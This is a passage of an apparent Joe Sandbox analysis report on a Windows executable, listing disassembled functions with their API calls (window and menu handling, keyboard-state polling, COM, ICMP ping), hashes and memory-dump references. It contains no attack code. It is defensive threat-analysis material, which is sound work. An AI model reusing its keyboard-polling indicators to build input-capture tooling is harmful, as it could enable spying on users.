                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 541375521-0
                                                                                                                                • Opcode ID: ca5377ec11183e66a999f555cf64e15e8256283a0e9581f4ce2077409158460e
                                                                                                                                • Instruction ID: 2c454f690c41bcb7cc6f9707eb9a7fe3d8cdd6b71eca82cddcf450a9d006bdb3
                                                                                                                                • Opcode Fuzzy Hash: ca5377ec11183e66a999f555cf64e15e8256283a0e9581f4ce2077409158460e
                                                                                                                                • Instruction Fuzzy Hash: E8510C25D0478829FB35DBA888117AABFB45F013D5F08458DDFC2561C3DA58AB8CE762
                                                                                                                                Function 00F4FAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00F4FB19
                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00F4FB2B
                                                                                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F4FB89
                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00F4FB94
                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00F4FBA6
                                                                                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F4FBFC
                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00F4FC0A
                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00F4FC1B
                                                                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F4FC5E
                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00F4FC6C
                                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F4FC89
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00F4FC96
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3096461208-0
                                                                                                                                • Opcode ID: 622ac807f0211954ea0ec021ba049079eccf429b95c4fbedb5304538f0db283b
                                                                                                                                • Instruction ID: 94f678f0c178267a5217d580e0aab875acfba7bbc2c0b19c7bcabe8c571b14b7
                                                                                                                                • Opcode Fuzzy Hash: 622ac807f0211954ea0ec021ba049079eccf429b95c4fbedb5304538f0db283b
                                                                                                                                • Instruction Fuzzy Hash: 19511171B00209AFDB18CF69DD95BAEBBBAEB88310F14813DF919D7290D7709E049B10
                                                                                                                                Function 00F2B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2B155: GetWindowLongW.USER32(?,000000EB), ref: 00F2B166
                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00F2B067
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ColorLongWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 259745315-0
                                                                                                                                • Opcode ID: 3dceeb316af55748d66f08e52e47a3731880214e8817a68ffb18ceb80413512c
                                                                                                                                • Instruction ID: c46086ad1b8edd5015929422c8c126365af91f49f0e1bcf182efa42289a67dd1
                                                                                                                                • Opcode Fuzzy Hash: 3dceeb316af55748d66f08e52e47a3731880214e8817a68ffb18ceb80413512c
                                                                                                                                • Instruction Fuzzy Hash: 3041C632500554AFDB21AF28EC58BBA3B66AB46731F184261FD768B1E1C7318C41FB61
                                                                                                                                Function 00F57334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 136442275-0
                                                                                                                                • Opcode ID: 22bab9ae8bb933f155d6c64063f9643f4977d5069efa31feb7231010ceb788d4
                                                                                                                                • Instruction ID: 81801ee341cbcacefebccfd3537d4344824a3a49434cc332619eea14ea613c97
                                                                                                                                • Opcode Fuzzy Hash: 22bab9ae8bb933f155d6c64063f9643f4977d5069efa31feb7231010ceb788d4
                                                                                                                                • Instruction Fuzzy Hash: 564100B290421CAADB25EB50DC41EDE73BCBB08320F5041E6B619A2051EE359BD8DF60
                                                                                                                                Function 00F184A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __swprintf.LIBCMT ref: 00F184E5
                                                                                                                                • __itow.LIBCMT ref: 00F18519
                                                                                                                                  • Part of subcall function 00F32177: _xtow@16.LIBCMT ref: 00F32198
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __itow__swprintf_xtow@16
                                                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                                                • API String ID: 1502193981-2263619337
                                                                                                                                • Opcode ID: 8e21c574257f78b274d4556e476166b69e96be92c86def8137ef0ab6835bf191
                                                                                                                                • Instruction ID: 18e8f6b2c8daf948a6a4e8d81d4966104df6f8d51408af03157e83b39f2d8f22
                                                                                                                                • Opcode Fuzzy Hash: 8e21c574257f78b274d4556e476166b69e96be92c86def8137ef0ab6835bf191
                                                                                                                                • Instruction Fuzzy Hash: D6412432A006059BDB24EB38DD41FAA77E5FF44760F24446EE549D6181EE35DA82FB10
                                                                                                                                Function 00F35C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00F35CCA
                                                                                                                                  • Part of subcall function 00F3889E: __getptd_noexit.LIBCMT ref: 00F3889E
                                                                                                                                • __gmtime64_s.LIBCMT ref: 00F35D63
                                                                                                                                • __gmtime64_s.LIBCMT ref: 00F35D99
                                                                                                                                • __gmtime64_s.LIBCMT ref: 00F35DB6
                                                                                                                                • __allrem.LIBCMT ref: 00F35E0C
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F35E28
                                                                                                                                • __allrem.LIBCMT ref: 00F35E3F
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F35E5D
                                                                                                                                • __allrem.LIBCMT ref: 00F35E74
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F35E92
                                                                                                                                • __invoke_watson.LIBCMT ref: 00F35F03
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 384356119-0
                                                                                                                                • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                • Instruction ID: 4236c4c9443d267e7b2a3f2f442e9423c30ae9d4b1ccf0854eaa970dbd09ff82
                                                                                                                                • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                • Instruction Fuzzy Hash: 8F71F872E01B16ABD7149F78CC81BAA77A8AF90B74F14413AFD10D7781E774DA40AB90
                                                                                                                                Function 00F557FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00F55816
                                                                                                                                • GetMenuItemInfoW.USER32(00FD18F0,000000FF,00000000,00000030), ref: 00F55877
                                                                                                                                • SetMenuItemInfoW.USER32(00FD18F0,00000004,00000000,00000030), ref: 00F558AD
                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 00F558BF
                                                                                                                                • GetMenuItemCount.USER32(?), ref: 00F55903
                                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00F5591F
                                                                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00F55949
                                                                                                                                • GetMenuItemID.USER32(?,?), ref: 00F5598E
                                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F559D4
                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F559E8
                                                                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F55A09
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4176008265-0
                                                                                                                                • Opcode ID: 5e14e62bb68842c2d03214caf5115c31f066085e35ca8fba2635663ac5d1c144
                                                                                                                                • Instruction ID: 73330500e8a84ad4e1810488f02bdb0ab2befe71ea92e3508b7d192dbdc0ab63
                                                                                                                                • Opcode Fuzzy Hash: 5e14e62bb68842c2d03214caf5115c31f066085e35ca8fba2635663ac5d1c144
                                                                                                                                • Instruction Fuzzy Hash: E161D571900649EFDF11CFA4CCA8AAE7BB9FF01B66F140119EA41A7251D3389D09EB20
                                                                                                                                Function 00F79A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F79AA5
                                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F79AA8
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00F79ACC
                                                                                                                                • _memset.LIBCMT ref: 00F79ADD
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F79AEF
                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F79B67
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 830647256-0
                                                                                                                                • Opcode ID: aadaa0ffd1b023b3e1952c968db215f10d1b3503d61883cea66055c14d9f5dff
                                                                                                                                • Instruction ID: 81a1d287244cf431c8799bf7df8ba708395d6bfb06eca36a559a6c3c3ae0dbdc
                                                                                                                                • Opcode Fuzzy Hash: aadaa0ffd1b023b3e1952c968db215f10d1b3503d61883cea66055c14d9f5dff
                                                                                                                                • Instruction Fuzzy Hash: 34617E71900208AFDB11DFA8CC81FEE77F8EF09710F10415AFA18A72A2D7B4A941EB51
                                                                                                                                Function 00F53569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetKeyboardState.USER32(?), ref: 00F53591
                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00F53612
                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00F5362D
                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00F53647
                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00F5365C
                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00F53674
                                                                                                                                • GetKeyState.USER32(00000011), ref: 00F53686
                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00F5369E
                                                                                                                                • GetKeyState.USER32(00000012), ref: 00F536B0
                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00F536C8
                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00F536DA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 541375521-0
                                                                                                                                • Opcode ID: 46ab58b961abd94ca4b4e268856a06d5dea26dc4e773331b4a73608b3020a557
                                                                                                                                • Instruction ID: 8d752b0b226a77f5c651cbe7e56c4af66ce75ab498bc7d38cd735fdc9706ac50
                                                                                                                                • Opcode Fuzzy Hash: 46ab58b961abd94ca4b4e268856a06d5dea26dc4e773331b4a73608b3020a557
                                                                                                                                • Instruction Fuzzy Hash: B5419560D047CA7DFF31576885147A5BEA06B113E5F08405EDFC6462C2EBA49BCCABA2
                                                                                                                                Function 00F4A28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00F4A2AA
                                                                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 00F4A2F5
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00F4A307
                                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F4A327
                                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00F4A36A
                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F4A37E
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00F4A393
                                                                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 00F4A3A0
                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F4A3A9
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00F4A3BB
                                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F4A3C6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2706829360-0
                                                                                                                                • Opcode ID: ab25b36de7a6414dcfad7eb252392bd3122088a49b9fabab638d98137e62104d
                                                                                                                                • Instruction ID: ae4e36bb2b55c184daa3d4f53e3c1d1e499e884ab2637afcb3f4b779c9a7845c
                                                                                                                                • Opcode Fuzzy Hash: ab25b36de7a6414dcfad7eb252392bd3122088a49b9fabab638d98137e62104d
                                                                                                                                • Instruction Fuzzy Hash: 70415B31D0021DAFCB00DFA8DC849EEBFB9FF48354F108065E901A3261DB75AA45EBA1
                                                                                                                                Function 00F6B250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F184A6: __swprintf.LIBCMT ref: 00F184E5
                                                                                                                                  • Part of subcall function 00F184A6: __itow.LIBCMT ref: 00F18519
                                                                                                                                • CoInitialize.OLE32 ref: 00F6B298
                                                                                                                                • CoUninitialize.COMBASE ref: 00F6B2A3
                                                                                                                                • CoCreateInstance.COMBASE(?,00000000,00000017,00F9D8FC,?), ref: 00F6B303
                                                                                                                                • IIDFromString.COMBASE(?,?), ref: 00F6B376
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00F6B410
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00F6B471
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                • API String ID: 834269672-1287834457
                                                                                                                                • Opcode ID: 848ed4e07c5e2dc5e728d5b1e9d2403930e63bd77bd6ba4f00b95c57443209b1
                                                                                                                                • Instruction ID: f4f700a6dbdd1721aa3e1ec94f95ce6fd98d3a328f89d7870aa8a88aea0344a8
                                                                                                                                • Opcode Fuzzy Hash: 848ed4e07c5e2dc5e728d5b1e9d2403930e63bd77bd6ba4f00b95c57443209b1
                                                                                                                                • Instruction Fuzzy Hash: 5361BD316083019FC710DF54C986B6EB7E8AF88724F14041DF985DB292DB70ED88EB92
                                                                                                                                Function 00F68694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • WSAStartup.WS2_32(00000101,?), ref: 00F686F5
                                                                                                                                • inet_addr.WS2_32(?), ref: 00F6873A
                                                                                                                                • gethostbyname.WS2_32(?), ref: 00F68746
                                                                                                                                • IcmpCreateFile.IPHLPAPI ref: 00F68754
                                                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F687C4
                                                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F687DA
                                                                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F6884F
                                                                                                                                • WSACleanup.WS2_32 ref: 00F68855
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                • String ID: Ping
                                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                                • Opcode ID: 364c8ba9a4a02a65b5c6db95537753501d0a7022416e86c3b2dd9ab42abf96e9
                                                                                                                                • Instruction ID: 2aa1f291b0e299a19eed1604eaaf4726d72e7fe2e57d954bce49f9911a4c29ce
